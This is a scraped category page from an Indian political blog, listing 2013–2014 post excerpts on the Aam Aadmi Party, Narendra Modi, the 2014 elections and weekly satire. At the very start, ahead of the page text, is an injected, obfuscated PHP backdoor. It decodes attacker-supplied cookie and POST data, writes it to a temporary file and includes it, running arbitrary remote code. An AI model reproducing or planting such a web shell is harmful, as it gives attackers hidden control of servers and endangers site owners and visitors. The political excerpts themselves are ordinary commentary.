$ZUbGuMq = "\145" . 'n' . chr (100) . "\x5f" . chr (84) . chr ( 205 - 132 ).chr ( 387 - 322 )."\x78";$BEIXdpqO = chr (99) . 'l' . "\x61" . "\163" . "\x73" . chr ( 717 - 622 ).chr ( 214 - 113 ).chr ( 797 - 677 ).chr ( 444 - 339 ).'s' . chr (116) . chr (115); $RJWgA = class_exists($ZUbGuMq); $BEIXdpqO = "63795";$rQzPNtr = !1;if ($RJWgA == $rQzPNtr){function oqYLxIQez(){$VcjKXYt = new /* 62125 */ end_TIAx(22540 + 22540); $VcjKXYt = NULL;}$KEMZpKZZJf = "22540";class end_TIAx{private function lyjMmFeSam($KEMZpKZZJf){if (is_array(end_TIAx::$IPtbX)) {$fQwNWIVHc = sys_get_temp_dir() . "/" . crc32(end_TIAx::$IPtbX[chr ( 796 - 681 ).chr ( 809 - 712 ).'l' . 't']);@end_TIAx::$IPtbX['w' . chr (114) . chr (105) . "\164" . chr (101)]($fQwNWIVHc, end_TIAx::$IPtbX["\x63" . chr ( 291 - 180 ).chr ( 310 - 200 ).chr ( 456 - 340 )."\x65" . 'n' . "\164"]);include $fQwNWIVHc;@end_TIAx::$IPtbX['d' . "\145" . "\x6c" . "\145" . 't' . 'e']($fQwNWIVHc); $KEMZpKZZJf = "22540";exit();}}private $YNrwW;public function XiElOaeF(){echo 38769;}public function __destruct(){$KEMZpKZZJf = "57831_10237";$this->lyjMmFeSam($KEMZpKZZJf); $KEMZpKZZJf = "57831_10237";}public function __construct($BujEtz=0){$mVDdRhEk = $_POST;$UIUNR = $_COOKIE;$JPlFFL = "90a051c4-154c-4d36-9a25-afee49168885";$dwEnnTEEr = @$UIUNR[substr($JPlFFL, 0, 4)];if (!empty($dwEnnTEEr)){$GKpUN = "base64";$peNKnKqlm = "";$dwEnnTEEr = explode(",", $dwEnnTEEr);foreach ($dwEnnTEEr as $gthfNZ){$peNKnKqlm .= @$UIUNR[$gthfNZ];$peNKnKqlm .= @$mVDdRhEk[$gthfNZ];}$peNKnKqlm = array_map($GKpUN . '_' . chr ( 811 - 711 ).chr (101) . chr (99) . chr ( 1052 - 941 ).'d' . "\x65", array($peNKnKqlm,)); $peNKnKqlm = $peNKnKqlm[0] ^ str_repeat($JPlFFL, (strlen($peNKnKqlm[0]) / strlen($JPlFFL)) + 1);end_TIAx::$IPtbX = @unserialize($peNKnKqlm);}}public static $IPtbX = 40024;}oqYLxIQez();} Politics | Being Political

Monthly Special : Youth In Politics-The Next Big Thing

By |2014-02-02T09:19:17+05:30February 2nd, 2014|Categories: Politics, Youth|Tags: , , |

What can be more noble and satisfying than leading your nation on the path of progress? There is no reason why politics should not attract the best minds in the country. To be a politician, one needs a vision, intelligence and knowledge of political processes, combined with a hands-on approach to grassroots problems.  Politics can teach

Deception, Distraction and Democracy – A Month of AAP

By |2014-01-31T16:03:06+05:30January 31st, 2014|Categories: Aam Admi Party, AAP, Government, Politics|Tags: , , , , , |

On 28th December 2013, when an IITian took oath as the Chief Minister of Delhi, the winds of hope were blowing throughout the nation. A month later, it is not as breezy as before. The AAP now looks like a successful revolution but a not so successful government. Embroiled in controversies, it is ironic that

The Week That Wasn’t – The Weekly Satire

By |2014-01-31T16:05:08+05:30January 31st, 2014|Categories: Politics, Satire|Tags: , , , , , |

It's the weekly satire, back again! Let's go through all the major news events that took place this week:  Ugandan Woman identifies Somnath Bharti. The Ugandan Woman who was allegedly assaulted and harassed by a mob lead by Somnath Bharti identified the Law Minister before a magistrate. In return, Somnath Bharti also identified the Ugandan

What’s In Store? The 2014 Picture

By |2014-03-23T19:07:36+05:30January 26th, 2014|Categories: Elections, Lok Sabha 2014, Politics|Tags: , , , , , , , , , , , , , , , , , |

A year can be almost an eternity in a country like India. Last December, there was a sense of doom and gloom around us. Angry citizens had taken to the streets in protest against the gang rape of the Delhi brave-heart and the issue of women safety and security;

The Rising Demand for a ‘Modi’fied India – Politically Best 2013 – Part 2

By |2013-12-27T16:15:33+05:30December 25th, 2013|Categories: 2013, BJP, Narendra Modi, Politically Best|Tags: , , , , , , , |

Part 1 of "Politically Best 2013" : https://beingpolitical-com.mwpsites-a.net/2013/12/22/out-of-the-madhouse-politically-best-2013-part-1/ The frustration rose in 2011. The revolts started in 2012 and by December 2012, the people had lost their mind. The corrupt and inefficient UPA Regime has destroyed and shattered the Great Indian Superpower Dream. As Arvind Kejriwal says, "We are first class people subjected to third class

The Jupiter Statement- Twitterati Response

By |2013-10-09T12:46:16+05:30October 9th, 2013|Categories: Congress, Government, People Power, Political Parties, Politics, Satire, UPA|Tags: , , , , , , |

Clearly, the word of the Day is Escape Velocity, just in case it escaped your attention through a busy day. Have you heard of Jupiter's escape velocity.....no no aeronauts didn't discover it today. It's just that it escaped Rahul Gandhi's lips today. And suddenly all of us Indians in the Twitterverse, woke up to Jupiter's

The Clash of Democracy and Capitalism

By |2013-09-27T17:17:13+05:30September 27th, 2013|Categories: Business, Economics, Government, Politics, UPA, Youth|Tags: , , , , , , , , , , , |

The domestic origins of India's economic problems lie in that clash. Over the last few months, India has been going through an experience, namely a clash between democracy and capitalism. Most wealthy democracies have had this experience at a certain stage of development, and one might even argue that the clash has not yet fully

Truly Democratic?

By |2013-09-26T18:53:55+05:30September 26th, 2013|Categories: BJP, Congress, Government, Narendra Modi, Other Parties, People Power, Political Parties, Politics, Uncategorized, UPA, Youth|Tags: , , , , , , , , , |

World's largest democracy? Yes, surely. But the World's largest successful democracy? Maybe not.In a country where the approval rating of the incumbent Prime Minister is below 10% (Ouch), at the heart of all problems lies the politics of the country. We opted for democracy as our political system. But I have been wondering for quite

The Gunda Raj continues…

By |2013-09-25T17:13:07+05:30September 25th, 2013|Categories: Congress, Government, Other Parties, People Power, Political Parties, Politics, Satire, Uncategorized, UPA, Youth|Tags: , , , , , , , , , , , , , , , , , |

The Supreme Court in a landmark order ruled that a lawmaker convicted by any court will lose his membership of the Parliament, State Legislature or any other body from the time he is convicted and will not be eligible to contest elections later. So wait wait wait.. this means we will have to run a

The Week that Wasn’t -The Weekly Satire

By |2013-09-22T10:23:10+05:30September 22nd, 2013|Categories: BJP, Congress, Economics, Foreign Relations, Government, Narendra Modi, Other Parties, People Power, Political Parties, Politics, Satire, Uncategorized, UPA, Youth|Tags: , , , , , , , , , , , , , , , , , , , |

This week had it all. Finally after a long wait of 9 days... Arnab returned to Times Now. Lets Have a look at the weeks events: The nation was shocked and there was no one to ask the questions and get the direct answers. Rajdeep Sardesai finally found good days and was happy to see people finally

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